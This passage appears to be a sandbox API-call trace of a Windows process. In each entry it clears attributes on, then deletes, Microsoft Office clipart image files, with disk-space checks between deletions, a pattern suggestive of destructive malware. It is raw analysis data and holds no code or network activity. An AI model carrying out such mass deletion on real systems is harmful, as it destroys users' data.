(lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382959.jpg")) returned 1 [0068.390] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG", dwFileAttributes=0x80) returned 1 [0068.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382960.jpg")) returned 1 [0068.403] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG", dwFileAttributes=0x80) returned 1 [0068.416] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382961.jpg")) returned 1 [0068.419] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG", dwFileAttributes=0x80) returned 1 [0068.430] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382962.jpg")) returned 1 [0068.435] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG", dwFileAttributes=0x80) returned 1 [0068.444] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382963.jpg")) returned 1 [0068.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG", dwFileAttributes=0x80) returned 1 [0068.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382965.jpg")) returned 1 [0068.461] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG", dwFileAttributes=0x80) returned 1 [0068.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382966.jpg")) returned 1 [0068.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG", dwFileAttributes=0x80) returned 1 [0068.490] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382967.jpg")) returned 1 [0068.493] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG", dwFileAttributes=0x80) returned 1 [0068.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382968.jpg")) returned 1 [0068.507] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG", dwFileAttributes=0x80) returned 1 [0068.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382969.jpg")) returned 1 [0068.522] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG", dwFileAttributes=0x80) returned 1 [0068.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382970.jpg")) returned 1 [0068.534] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG", dwFileAttributes=0x80) returned 1 [0068.547] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384862.jpg")) returned 1 [0068.550] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG", dwFileAttributes=0x80) returned 1 [0068.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384885.jpg")) returned 1 [0068.562] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG", dwFileAttributes=0x80) returned 1 [0068.578] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384888.jpg")) returned 1 [0068.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG", dwFileAttributes=0x80) returned 1 [0068.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384895.jpg")) returned 1 [0068.591] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG", dwFileAttributes=0x80) returned 1 [0068.600] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384900.jpg")) returned 1 [0068.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG", dwFileAttributes=0x80) returned 1 [0068.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386120.jpg")) returned 1 [0068.612] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG", dwFileAttributes=0x80) returned 1 [0068.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386267.jpg")) returned 1 [0068.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG", dwFileAttributes=0x80) returned 1 [0068.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386270.jpg")) returned 1 [0068.633] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG", dwFileAttributes=0x80) returned 1 [0068.638] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386485.jpg")) returned 1 [0068.641] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG", dwFileAttributes=0x80) returned 1 [0068.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386764.jpg")) returned 1 [0068.650] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG", dwFileAttributes=0x80) returned 1 [0068.657] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387337.jpg")) returned 1 [0068.659] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG", dwFileAttributes=0x80) returned 1 [0068.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387578.jpg")) returned 1 [0068.671] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG", dwFileAttributes=0x80) returned 1 [0068.677] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387591.jpg")) returned 1 [0068.680] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG", dwFileAttributes=0x80) returned 1 [0068.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387604.jpg")) returned 1 [0068.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG", dwFileAttributes=0x80) returned 1 [0068.696] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387882.jpg")) returned 1 [0068.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG", dwFileAttributes=0x80) returned 1 [0068.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387895.jpg")) returned 1 [0068.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.761] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG", dwFileAttributes=0x80) returned 1 [0068.761] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0390072.jpg")) returned 1 [0068.764] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG", dwFileAttributes=0x80) returned 1 [0068.790] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400001.png")) returned 1 [0068.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG", dwFileAttributes=0x80) returned 1 [0068.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400002.png")) returned 1 [0068.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG", dwFileAttributes=0x80) returned 1 [0068.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400003.png")) returned 1 [0068.823] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG", dwFileAttributes=0x80) returned 1 [0068.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400004.png")) returned 1 [0068.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG", dwFileAttributes=0x80) returned 1 [0068.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400005.png")) returned 1 [0068.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG", dwFileAttributes=0x80) returned 1 [0068.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01046j.jpg")) returned 1 [0068.885] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG", dwFileAttributes=0x80) returned 1 [0068.894] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01179j.jpg")) returned 1 [0068.897] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG", dwFileAttributes=0x80) returned 1 [0068.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01213k.jpg")) returned 1 [0068.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG", dwFileAttributes=0x80) returned 1 [0068.911] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01221k.jpg")) returned 1 [0068.917] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG", dwFileAttributes=0x80) returned 1 [0068.927] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01239k.jpg")) returned 1 [0068.933] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG", dwFileAttributes=0x80) returned 1 [0068.940] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01931j.jpg")) returned 1 [0068.943] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG", dwFileAttributes=0x80) returned 1 [0068.949] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft 